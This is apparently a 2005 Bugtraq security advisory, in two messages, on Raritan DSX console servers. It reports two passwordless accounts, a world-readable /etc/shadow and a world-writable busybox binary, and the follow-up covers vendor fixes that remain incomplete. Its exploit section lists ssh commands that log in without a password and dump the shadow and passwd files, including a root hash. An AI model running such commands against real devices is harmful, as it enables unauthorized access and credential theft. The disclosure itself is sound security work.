Access right escalation / severe permission problems on Raritan Console Servers
0 views
Skip to first unread message
sp...@drwetter.org
Jun 28, 2005, 1:56:55 PM6/28/05
to bug...@securityfocus.com
Hi,
during my research on console servers I've encountered a severe problem on one appliance.
Summary:
Access right escalation / severe permission problems on Raritan Console Servers
Confirmed on DSX32, Software version: 2.4.6
www.raritan.com, more see below
Details:
DSX Raritan Console Servers come with two accounts not having a password. They are "protected" by "exit" in ~/.profile. Users normally is not supposed to get access to the underlying Linux.
DES encrypted root passwd is easily retrievable from the network without providing credentials. Also the machine can be rendered useless by moving the busybox binary.
Vulnerable Versions:
Vendor Confirmation for DSX16, DSX32, DSX4, DSX8, DSXA-48 (Mips and Intel).
Patches/Workarounds:
After reporting it to Raritan a fix was released:
http://www.raritan.com/support/sup_upgrades.aspx
Exploit:
%ssh dominion@<ip> ls -l /
[..shows listing..]
%ssh dominion@<ip> ls -ln /etc/shadow
-rw-r--r-- 1 0 0 360 Jun 28 05:09 /etc/shadow
%ssh dominion@<ip> cat /etc/shadow
root:DX8k7w4C2gJ2g:10933:0:99999:7:::
bin:*:10933:0:99999:7:::
daemon:*:10933:0:99999:7:::
adm:*:10933:0:99999:7:::
lp:*:10933:0:99999:7:::
sync:*:10933:0:99999:7:::
shutdown:*:10933:0:99999:7:::
halt:*:10933:0:99999:7:::
uucp:*:10933:0:99999:7:::
operator:*:10933:0:99999:7:::
nobody:*:10933:0:99999:7:::
dominion::12962:0:99999:7:::
sshd::12962:0:99999:7:::
%ssh dominion@<ip> cat /etc/passwd | tail -2
dominion:x:500:500:Embedix User,,,:/home/dominion:/bin/sh
sshd:x:501:501:Embedix User,,,:/home/sshd:/bin/sh
%ssh sshd@<ip> ls
indexApp.htm
%ssh sshd@<ip> ls -l /bin/busybox
-rwxrwxrwx 1 root root 193852 Apr 4 2004 /bin/busybox
-----
Dr. Dirk Wetter http://drwetter.org
Consulting IT-Security + Open Source
Key fingerprint = 80A2 742B 8195 969C 5FA6 6584 8B6E 59C1 E41B 9153
sp...@drwetter.org
Jul 3, 2005, 11:11:53 AM7/3/05
to bug...@securityfocus.com
Hi,
the second fix FCR7787 was released @ http://www.raritan.com/support/sup_upgrades.aspx.
FCR7551 was withdrawn.
As opposed to FCR7551 FCR7787 locks the remaining account sshd (with busybox' passwd -l). In fact it does a few exec calls (2xadduser,2xdeluser,2xpasswd). It doesn't resolve the permission problems on /etc/shadow and /bin/busybox though.
Though asking politely the vendor again didn't notify me of the fix.
Cheers,
Dirk
the second fix FCR7787 was released @ http://www.raritan.com/support/sup_upgrades.aspx.
FCR7551 was withdrawn.
As opposed to FCR7551 FCR7787 locks the remaining account sshd (with busybox' passwd -l). In fact it does a few exec calls (2xadduser,2xdeluser,2xpasswd). It doesn't resolve the permission problems on /etc/shadow and /bin/busybox though.
Though asking politely the vendor again didn't notify me of the fix.
Cheers,
Dirk
Reply all
Reply to author
Forward
0 new messages